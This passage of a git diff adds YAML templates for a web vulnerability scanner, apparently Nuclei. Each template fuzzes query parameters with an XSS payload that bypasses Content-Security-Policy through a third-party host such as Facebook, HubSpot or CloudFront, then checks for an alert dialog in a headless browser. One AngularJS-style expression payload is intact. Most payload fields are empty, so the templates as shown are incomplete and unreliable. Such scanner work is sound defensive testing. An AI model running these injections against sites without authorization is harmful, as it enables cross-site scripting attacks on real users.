cxense_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cxense_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml b/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml new file mode 100644 index 00000000000..a12d28c22e0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml @@ -0,0 +1,55 @@ +id: d-adroll-csp-xss + +info: + name: Content-Security-Policy Bypass via AdRoll + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,adroll + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: d_adroll_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "d_adroll_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml b/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml new file mode 100644 index 00000000000..390bffe9793 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml @@ -0,0 +1,55 @@ +id: d1xrp9zhb3ks3c-cloudfront-csp-xss + +info: + name: Content-Security-Policy Bypass via CloudFront + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudfront + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: d1xrp9zhb3ks3c_cloudfront_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "d1xrp9zhb3ks3c_cloudfront_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml new file mode 100644 index 00000000000..7bd93e8cbd0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: dailymotion-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Dailymotion API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,dailymotion + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dailymotion_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dailymotion_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml new file mode 100644 index 00000000000..41aff8535af --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml @@ -0,0 +1,55 @@ +id: dblp-csp-xss + +info: + name: Content-Security-Policy Bypass via DBLP + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,dblp + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dblp_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dblp_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml new file mode 100644 index 00000000000..0fac2a05425 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: demo-matomo-csp-xss + +info: + name: Content-Security-Policy Bypass via Matomo Demo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,matomo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: demo_matomo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "demo_matomo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml new file mode 100644 index 00000000000..b464325ecdd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml @@ -0,0 +1,55 @@ +id: dev-virtualearth-csp-xss + +info: + name: Content-Security-Policy Bypass via Virtual Earth + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,virtualearth + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dev_virtualearth_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dev_virtualearth_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml new file mode 100644 index 00000000000..fe2344d5f56 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml @@ -0,0 +1,55 @@ +id: developer-apple-csp-xss + +info: + name: Content-Security-Policy Bypass via Apple Developer + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,apple + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: developer_apple_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "developer_apple_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml new file mode 100644 index 00000000000..352443f01a7 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml @@ -0,0 +1,55 @@ +id: digitalocean-anchor-csp-xss + +info: + name: Content-Security-Policy Bypass via DigitalOcean Anchor + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,digitalocean + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: digitalocean_anchor_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "digitalocean_anchor_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml new file mode 100644 index 00000000000..c1018966e39 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml @@ -0,0 +1,55 @@ +id: documentation-resources-opendatasoft-csp-xss + +info: + name: Content-Security-Policy Bypass via Opendatasoft Documentation + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,opendatasoft + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: documentation_resources_opendatasoft_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "documentation_resources_opendatasoft_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml b/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml new file mode 100644 index 00000000000..c9f676fd230 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml @@ -0,0 +1,55 @@ +id: don-bild-csp-xss + +info: + name: Content-Security-Policy Bypass via Bild + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bild + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: don_bild_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "don_bild_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml new file mode 100644 index 00000000000..42594a19e6d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml @@ -0,0 +1,55 @@ +id: dpm-demdex-csp-xss + +info: + name: Content-Security-Policy Bypass via Demdex + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,demdex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dpm_demdex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dpm_demdex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml new file mode 100644 index 00000000000..fe6a00a0076 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: duckduckgo-api-csp-xss + +info: + name: Content-Security-Policy Bypass via DuckDuckGo API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,duckduckgo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: duckduckgo_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "duckduckgo_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml new file mode 100644 index 00000000000..15b67acae93 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml @@ -0,0 +1,55 @@ +id: dynamic-criteo-csp-xss + +info: + name: Content-Security-Policy Bypass via Criteo Dynamic + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,criteo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dynamic_criteo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dynamic_criteo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml b/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml new file mode 100644 index 00000000000..55af634a271 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml @@ -0,0 +1,55 @@ +id: elysiumwebsite-s3-csp-xss + +info: + name: Content-Security-Policy Bypass via Elysium S3 + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,aws + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
foo
{{ [1].reduce(value.alert, 1); }}
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: elysiumwebsite_s3_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "elysiumwebsite_s3_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml new file mode 100644 index 00000000000..e17d0ab900b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/eu-battle-net-csp-xss.yaml @@ -0,0 +1,55 @@ +id: eu-battle-net-csp-xss + +info: + name: Content-Security-Policy Bypass via Battle.net EU + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,battlenet + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: eu_battle_net_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "eu_battle_net_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml new file mode 100644 index 00000000000..0a692716d06 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/facebook-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: facebook-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Facebook API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,facebook + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: facebook_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "facebook_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml new file mode 100644 index 00000000000..8b1cdc20718 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/facebook-csp-xss.yaml @@ -0,0 +1,55 @@ +id: facebook-csp-xss + +info: + name: Content-Security-Policy Bypass via Facebook + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,facebook + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: facebook_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "facebook_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml new file mode 100644 index 00000000000..060bc59f46f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/fast-wistia-csp-xss.yaml @@ -0,0 +1,55 @@ +id: fast-wistia-csp-xss + +info: + name: Content-Security-Policy Bypass via Wistia + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wistia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: fast_wistia_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "fast_wistia_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml new file mode 100644 index 00000000000..ca925f0b35f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/flickr-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: flickr-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Flickr API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,flickr + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: flickr_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "flickr_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml new file mode 100644 index 00000000000..0196cca21bd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/forismatic-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: forismatic-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Forismatic API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,forismatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: forismatic_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "forismatic_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml new file mode 100644 index 00000000000..3ea58b62c2c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/forms-hsforms-csp-xss.yaml @@ -0,0 +1,55 @@ +id: forms-hsforms-csp-xss + +info: + name: Content-Security-Policy Bypass via HubSpot Forms + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hubspot + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: forms_hsforms_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "forms_hsforms_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml new file mode 100644 index 00000000000..ef1b668cacf --- /dev/null +++ b/dast/vulnerabilities/xss/csp/forms-hubspot-csp-xss.yaml @@ -0,0 +1,55 @@ +id: forms-hubspot-csp-xss + +info: + name: Content-Security-Policy Bypass via HubSpot + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hubspot + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: forms_hubspot_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "forms_hubspot_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml new file mode 100644 index 00000000000..ff73bdbe68a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/fwmrm-csp-xss.yaml @@ -0,0 +1,55 @@ +id: fwmrm-csp-xss + +info: + name: Content-Security-Policy Bypass via Fwmrm + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,fwmrm + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: fwmrm_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "fwmrm_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml new file mode 100644 index 00000000000..696c9924bb3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/geo-moatads-csp-xss.yaml @@ -0,0 +1,55 @@ +id: geo-moatads-csp-xss + +info: + name: Content-Security-Policy Bypass via Moat Ads + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,moatads + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: geo_moatads_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "geo_moatads_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml b/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml new file mode 100644 index 00000000000..8420e4619ae --- /dev/null +++ b/dast/vulnerabilities/xss/csp/geolocation-onetrust-csp-xss.yaml @@ -0,0 +1,55 @@ +id: geolocation-onetrust-csp-xss + +info: + name: Content-Security-Policy Bypass via OneTrust Geolocation + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,onetrust + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: geolocation_onetrust_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "geolocation_onetrust_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml new file mode 100644 index 00000000000..9635bf17206 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/getdrip-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: getdrip-api-csp-xss + +info: + name: Content-Security-Policy Bypass via GetDrip API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,getdrip + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, 